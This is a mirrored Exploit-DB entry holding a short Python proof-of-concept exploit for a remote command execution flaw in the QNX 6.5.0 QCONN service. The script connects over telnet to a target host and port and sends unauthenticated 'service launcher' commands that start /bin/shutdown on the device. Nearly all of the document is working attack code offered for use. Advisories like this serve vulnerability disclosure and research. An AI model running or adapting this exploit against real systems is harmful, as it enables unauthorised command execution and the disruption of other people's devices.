QNX 6.5.0 / QCONN 1.4.207944 – Remote Command Execution - 体验盒子

作者： Mor!p3r

日期： 2012-09-25

类别：

remote

平台：

linux

来源：https://www.exploit-db.com/exploits/21520/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

# Title : QNX QCONN Remote Command Execution Vurnerability

# Version : QNX 6.5.0 >= , QCONN >= 1.4.207944

# Download: http://www.qnx.com/download/feature.html?programid=23665 (QNX Neutrino 6.5.0 SP1)

# Vendor : http://www.qnx.com

# Date : 2012/09/09

# CVE : N/A

# Exploit Author : Mor!p3r(moriper[at]gmail.com)

import telnetlib

import sys

if len(sys.argv) < 3:

print " "

print " -----------------------------------------------------"

print " + Qconn Remote Command Execution PoC (Shutdown) +"

print " -----------------------------------------------------"

print " "

print " + Usage: QCONNRC.py <Target IP> <Port>"

print "+ Ex> QCONNRC.py 192.168.0.1 8000"

print ""

sys.exit(1)

host = sys.argv[1]

port = int(sys.argv[2])

attack ="service launcher\n" + "start/flags 8000 /bin/shutdown /bin/shutdown -b\n" + "continue\n"

telnet = telnetlib.Telnet(host, port)

telnet.write(attack)

print "[+] Finish"

telnet.close()